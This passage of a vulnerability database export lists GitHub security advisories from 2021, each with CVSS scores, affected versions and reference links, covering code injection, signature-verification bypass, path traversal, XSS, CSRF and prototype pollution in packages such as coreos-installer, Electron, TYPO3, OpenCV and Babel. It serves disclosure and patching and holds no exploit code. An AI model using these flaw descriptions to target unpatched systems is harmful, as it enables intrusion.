+1.4.0,GHSA-j28r-j54m-gpc4,2021-10-15T17:28:26Z,2021-10-05T17:53:59Z,,['CVE-2021-22557'],Code Injection in SLO Generator,SLO generator allows for loading of YAML files that if crafted in a specific format can allow for code execution within the context of the SLO Generator. We recommend upgrading SLO Generator past https://github.com/google/slo-generator/pull/173 ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'slo-generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22557'}, {'type': 'WEB', 'url': 'https://github.com/google/slo-generator/pull/173'}, {'type': 'WEB', 'url': 'https://github.com/google/slo-generator/commit/36318beab1b85d14bb860e45bea186b184690d5d'}, {'type': 'WEB', 'url': 'https://github.com/google/slo-generator/releases/tag/v2.0.1'}, {'type': 'PACKAGE', 'url': '://github.com/google/slo-generator'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164426/Google-SLO-Generator-2.0.0-Code-Execution.html'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T16:01:42Z', 'nvd_published_at': '2021-10-04T10:15:00Z'}"
+1.4.0,GHSA-3r3g-g73x-g593,2022-06-01T21:25:06Z,2021-10-12T16:06:47Z,,['CVE-2021-20319'],coreos-installer improperly verifies GPG signature when decompressing gzipped artifact,"### Impact
+
+coreos-installer fails to correctly verify GPG signatures when decompressing gzip-compressed artifacts. This allows bypass of signature verification in cases where coreos-installer decompresses a downloaded OS image, allowing an attacker who can modify the OS image to compromise a newly-installed system.
+
+Default installations from ISO or PXE media in Fedora CoreOS, RHEL CoreOS, and RHEL for Edge are **not** affected, as coreos-installer installs from an OS image shipped as part of the install media.
+
+These flows are affected:
+
+1. Installing with `--image-file`, `--image-url`, or `coreos.inst.image_url`. For example, if a user has a local mirror of installation images, an attacker could replace an image with a gzip-compressed alternative (even if the file extension is `.xz`). The result:
+
+ ```
+ $ coreos-installer install --image-url http://localhost:8080/image.xz /dev/loop0
+ Downloading image from http://localhost:8080/image.xz
+ Downloading signature from http://localhost:8080/image.xz.sig
+ > Read disk 749.9 MiB/749.9 MiB (100%)
+ gpg: Signature made Mon 20 Sep 2021 02:41:50 PM EDT
+ gpg: using RSA key 8C5BA6990BDB26E19F2A1A801161AE6945719A39
+ gpg: BAD signature from ""Fedora (34) "" [ultimate]
+ Install complete.
+ ```
+
+ Notice that GPG reports a bad signature, but coreos-installer continues anyway. Automation that relies on coreos-installer's exit status will not notice either.
+
+2. `coreos-installer download --decompress --image-url`:
+
+ ```
+ $ coreos-installer download --decompress --image-url http://localhost:8080/image.xz
+ > Read disk 749.9 MiB/749.9 MiB (100%)
+ gpg: Signature made Mon 20 Sep 2021 02:41:50 PM EDT
+ gpg: using RSA key 8C5BA6990BDB26E19F2A1A801161AE6945719A39
+ gpg: BAD signature from ""Fedora (34) "" [ultimate]
+ ./image
+ ```
+
+ Again, coreos-installer reports success.
+
+3. Installing with default parameters, when **not** installing from the image built into live ISO or PXE media, if the hosting service is compromised or if an active attacker gains control of the HTTPS response.
+
+4. `coreos-installer download --decompress` if the hosting service is compromised or if an active attacker gains control of the HTTPS response.
+
+### Patches
+
+The vulnerability is [fixed](https://github.com/coreos/coreos-installer/pull/659) in coreos-installer 0.10.1.
+
+### Workarounds
+
+For `coreos-installer download`, do not use the `-d` or `--decompress` options.
+
+For `coreos-installer install`, manually inspect the stderr output. If `BAD signature` appears, do not boot from the target disk. Note, however, that some OS services may have already accessed data on the compromised disk.
+
+### References
+
+For more information, see [PR 655](https://github.com/coreos/coreos-installer/pull/655).
+
+### For more information
+
+If you have any questions or comments about this advisory, [open an issue in coreos-installer](https://github.com/coreos/coreos-installer/issues/new/choose) or email the CoreOS [development mailing list](https://lists.fedoraproject.org/archives/list/coreos@lists.fedoraproject.org/).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'coreos-installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/security/advisories/GHSA-3r3g-g73x-g593'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20319'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/pull/655'}, {'type': 'WEB', 'url': 'https://github.com/coreos/coreos-installer/pull/659/commits/ad243c6f0eff2835b2da56ca5f7f33af76253c89'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2011862'}, {'type': 'PACKAGE', 'url': 'https://github.com/coreos/coreos-installer'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T21:17:04Z', 'nvd_published_at': '2022-03-04T18:15:00Z'}"
+1.4.0,GHSA-x3r5-q6mj-m485,2021-10-19T18:04:34Z,2021-10-19T20:16:15Z,,['CVE-2021-41149'],Improper sanitization of target names,"### Impact
+The tough library, prior to 0.12.0, does not properly sanitize target names when caching a repository, or when saving specific targets to an output directory. When targets are cached or saved, files could be overwritten with arbitrary content anywhere on the system.
+
+AWS would like to thank https://github.com/jku for reporting this issue.
+
+### Patches
+A fix is available in version 0.12.0.
+
+### Workarounds
+No workarounds to this issue are known.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tough'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/awslabs/tough/security/advisories/GHSA-x3r5-q6mj-m485'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41149'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}, {'type': 'PACKAGE', 'url': 'https://github.com/awslabs/tough'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T18:04:34Z', 'nvd_published_at': '2021-10-19T18:15:00Z'}"
+1.4.0,GHSA-cq6w-w5rj-p9x8,2021-10-06T16:55:25Z,2021-10-06T17:47:05Z,,['CVE-2021-30109'],Cross-site Scripting in Froala Editor,"Froala Editor 3.2.6 is affected by Cross Site Scripting (XSS). Under certain conditions, a base64 crafted string leads to persistent Cross-site scripting (XSS) vulnerability within the hyperlink creation module.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'froala-editor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30109'}, {'type': 'WEB', 'url': 'https://github.com/Hackdwerg/CVE-2021-30109/blob/main/README.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/froala/wysiwyg-editor-release'}, {'type': 'WEB', 'url': 'http://froala.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:55:25Z', 'nvd_published_at': '2021-04-05T13:15:00Z'}"
+1.4.0,GHSA-mpjm-v997-c4h4,2022-08-11T16:56:02Z,2021-10-12T21:59:13Z,,['CVE-2021-39184'],Electron's sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API,"### Impact
+This vulnerability allows a sandboxed renderer to request a ""thumbnail"" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases.
+
+All current stable versions of Electron are affected.
+
+### Patches
+This was fixed with #30728, and the following Electron versions contain the fix:
+
+- 15.0.0-alpha.10
+- 14.0.0
+- 13.3.0
+- 12.1.0
+- 11.5.0
+
+### Workarounds
+If your app enables `contextIsolation`, this vulnerability is significantly more difficult for an attacker to exploit.
+
+Further, if your app does not depend on the `createThumbnailFromPath` API, then you can simply disable the functionality. In the main process, before the 'ready' event:
+```js
+delete require('electron').nativeImage.createThumbnailFromPath
+```
+
+### For more information
+If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.1.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.0.0'}, {'fixed': '13.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/electron/electron/security/advisories/GHSA-mpjm-v997-c4h4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39184'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/30728'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f'}, {'type': 'PACKAGE', 'url': 'https://github.com/electron/electron'}]","{'cwe_ids': ['CWE-668', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T18:54:44Z', 'nvd_published_at': '2021-10-12T19:15:00Z'}"
+1.4.0,GHSA-qh9q-34h6-hcv9,2021-10-18T20:15:47Z,2021-10-12T18:48:24Z,,['CVE-2021-40978'],Directory traversal in mkdocs,"The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mkdocs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40978'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/issues/2601'}, {'type': 'WEB', 'url': 'https://github.com/nisdn/CVE-2021-40978/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/pull/2604'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/pull/2604/commits/cddc453c9d49298e60e7d56fb71130c151cbcbe5'}, {'type': 'PACKAGE', 'url': 'https://github.com/mkdocs/mkdocs'}, {'type': 'WEB', 'url': 'https://github.com/mkdocs/mkdocs/releases/tag/1.2.3'}, {'type': 'WEB', 'url': 'https://github.com/nisdn/CVE-2021-40978'}]","{'cwe_ids': ['CWE-12', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:41:01Z', 'nvd_published_at': '2021-10-07T14:15:00Z'}"
+1.4.0,GHSA-3r9x-mjrm-2725,2021-10-08T22:09:39Z,2021-10-12T16:27:02Z,,['CVE-2020-28283'],Prototype pollution vulnerability in 'libnested',Prototype pollution vulnerability in 'libnested' versions 0.0.0 through 1.5.0 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'libnested'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}, {'last_affected': '1.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28283'}, {'type': 'PACKAGE', 'url': 'https://github.com/dominictarr/libnested'}, {'type': 'WEB', 'url': 'https://github.com/dominictarr/libnested/blob/d028a1b0f2e5f16fc28e568f52b936ae0bca0647/index.js#L27'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28284'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:09:39Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}"
+1.4.0,GHSA-657m-v5vm-f6rw,2021-11-01T21:06:16Z,2021-10-05T20:23:47Z,,['CVE-2021-41113'],Cross-Site-Request-Forgery in Backend,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C` (8.2)
+
+### Problem
+It has been discovered that the new TYPO3 v11 feature that allows users to create and share [deep links in the backend user interface](https://typo3.org/article/typo3-version-112-escape-the-orbit#c12178) is vulnerable to cross-site-request-forgery.
+
+The impact is the same as described in [TYPO3-CORE-SA-2020-006 (CVE-2020-11069)](https://typo3.org/security/advisory/typo3-core-sa-2020-006). However, it is not limited to the same site context and does not require the attacker to be authenticated. In a worst case scenario, the attacker could create a new admin user account to compromise the system.
+
+To successfully carry out an attack, an attacker must trick his victim to access a compromised system. The victim must have an active session in the TYPO3 backend at that time.
+
+The following [Same-Site cookie settings](https://docs.typo3.org/c/typo3/cms-core/master/en-us/Changelog/8.7.x/Feature-90351-ConfigureTYPO3-shippedCookiesWithSameSiteFlag.html) in _$GLOBALS[TYPO3_CONF_VARS][BE][cookieSameSite]_ are required for an attack to be successful:
+
+* _SameSite=_***strict***: malicious evil.**example.org** invoking TYPO3 application at good.**example.org**
+* _SameSite=_***lax*** or ***none***: malicious **evil.com** invoking TYPO3 application at **example.org**
+
+### Solution
+Update your instance to TYPO3 version 11.5.0 which addresses the problem described.
+
+### Credits
+Thanks to Richie Lee who reported this issue and to TYPO3 core & security team members Benni Mack and Oliver Hader who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-014](https://typo3.org/security/advisory/typo3-core-sa-2021-014)
+* [CVE-2020-11069](https://nvd.nist.gov/vuln/detail/CVE-2020-11069) reintroduced in TYPO3 v11.2.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.2.0'}, {'fixed': '11.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-657m-v5vm-f6rw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11069'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41113'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/fa51999203c5e5d913ecae5ea843ccb2b95fa33f'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-006'}]","{'cwe_ids': ['CWE-309', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:48:07Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}"
+1.4.0,GHSA-pfj7-w373-gqch,2021-10-29T13:49:08Z,2021-10-28T23:14:21Z,,['CVE-2021-3900'],Cross-Site Request Forgery in firefly-iii,firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3900'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/c2c8c42ef3194d1aeba8c48240fe2e9063f77635'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/909e55b6-ef02-4143-92e4-bc3e8397db76'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T21:13:22Z', 'nvd_published_at': '2021-10-27T18:15:00Z'}"
+1.4.0,GHSA-gxmc-5wj3-jx64,2021-10-05T16:02:20Z,2021-10-04T20:13:25Z,,['CVE-2021-41467'],Cross-site scripting in application/controllers/dropbox.php in JustWriting,Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'hjue/justwriting'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41467'}, {'type': 'WEB', 'url': 'https://github.com/hjue/JustWriting/issues/106'}, {'type': 'PACKAGE', 'url': 'https://github.com/hjue/JustWriting'}, {'type': 'WEB', 'url': 'https://github.com/hjue/JustWriting/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T13:46:27Z', 'nvd_published_at': '2021-10-01T16:15:00Z'}"
+1.4.0,GHSA-2w3f-9w3q-qw77,2021-10-20T17:12:24Z,2021-10-12T18:30:37Z,,['CVE-2021-23448'],Prototype Pollution in config-handler,All versions of package config-handler are vulnerable to Prototype Pollution when loading config files.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'config-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23448'}, {'type': 'WEB', 'url': 'https://github.com/jarradseers/config-handler/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/jarradseers/config-handler'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947'}]","{'cwe_ids': ['CWE-913'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T17:01:08Z', 'nvd_published_at': '2021-10-11T21:15:00Z'}"
+1.4.0,GHSA-cx2r-mf6x-55rx,2021-10-08T22:31:21Z,2021-10-12T16:01:36Z,,['CVE-2020-5273'],Stored XSS with custom URLs in PrestaShop module ps_linklist,"### Impact
+Stored XSS when using custom URLs.
+
+### Patches
+The problem is fixed in 3.1.0
+
+### References
+[Cross-site Scripting (XSS) - Stored (CWE-79)](https://cwe.mitre.org/data/definitions/79.html)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/ps_linklist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_linklist/security/advisories/GHSA-cx2r-mf6x-55rx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5273'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_linklist/commit/83e6e0bdda2287f4d6e64127cb90c41d26b5ad82'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/ps_linklist'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:31:21Z', 'nvd_published_at': '2020-04-16T22:15:00Z'}"
+1.4.0,GHSA-wv83-jrfh-rp33,2021-10-21T14:56:27Z,2021-10-18T19:44:32Z,,['CVE-2021-42227'],Cross site scripting in kindeditor,Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via a Google search inurl:/examples/uploadbutton.html and then the .html file on the website that uses this editor (the file suffix is allowed).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'kindeditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42227'}, {'type': 'WEB', 'url': 'https://github.com/kindsoft/kindeditor/issues/336'}, {'type': 'PACKAGE', 'url': 'https://github.com/kindsoft/kindeditor'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-15T17:38:42Z', 'nvd_published_at': '2021-10-14T17:15:00Z'}"
+1.4.0,GHSA-hxfw-jm98-v4mq,2021-11-18T15:27:49Z,2021-10-12T22:21:56Z,,['CVE-2019-15939'],Divide By Zero in OpenCV.,An issue was discovered in OpenCV 4.1.0 (OpenCV-Python 4.1.0.25). There is a divide-by-zero error in cv::HOGDescriptor::getDescriptorSize in modules/objdetect/src/hog.cpp.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15939'}, {'type': 'WEB', 'url': 'https://github.com/OpenCV/opencv/issues/15287'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/15382'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00025.html'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T20:35:29Z', 'nvd_published_at': '2019-09-05T16:15:00Z'}"
+1.4.0,GHSA-7m27-3587-83xf,2021-10-20T15:06:01Z,2021-10-21T17:46:27Z,,['CVE-2019-10170'],Privilege Defined With Unsafe Actions in Keycloak,"A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10170'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10170'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]","{'cwe_ids': ['CWE-267'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T15:06:01Z', 'nvd_published_at': '2020-05-08T14:15:00Z'}"
+1.4.0,GHSA-267x-w5hx-8hjr,2021-11-18T15:30:14Z,2021-10-12T22:02:45Z,,['CVE-2017-12864'],Integer Overflow or Wraparound in OpenCV,"In opencv/modules/imgcodecs/src/grfmt_pxm.cpp, function ReadNumber did not checkout the input length, which lead to integer overflow. If the image is from remote, may lead to remote code execution or denial of service. This affects OpenCV 3.3 (corresponding with OpenCV-Python version 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12864'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9372'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:35:35Z', 'nvd_published_at': '2017-08-15T16:29:00Z'}"
+1.4.0,GHSA-p75j-wc34-527c,2021-10-08T23:04:41Z,2021-10-12T16:31:59Z,,['CVE-2019-10217'],Exposure of Sensitive Information to an Unauthorized Actor in ansible,A flaw was found in ansible 2.8.0 before 2.8.4. Fields managing sensitive data should be set as such by no_log feature. Some of these fields in GCP modules are not set properly. service_account_contents() which is common class for all gcp modules is not setting no_log to True. Any sensitive data managed by that function would be leak as an output when running ansible playbooks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10217'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/56269'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/59427'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10217'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00026.html'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:04:41Z', 'nvd_published_at': '2019-11-25T16:15:00Z'}"
+1.4.0,GHSA-h4m5-qpfp-3mpv,2021-10-27T17:06:39Z,2021-10-21T17:49:59Z,,['CVE-2021-42771'],Directory Traversal in Babel,"Babel.Locale in Babel before 2.9.1 allows attackers to load arbitrary locale .dat files (containing serialized Python objects) via directory traversal, leading to code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'babel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42771'}, {'type': 'WEB', 'url': 'https://github.com/python-babel/babel/pull/782'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-babel/babel/'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts/2021/10/msg00040.html'}, {'type': 'WEB', 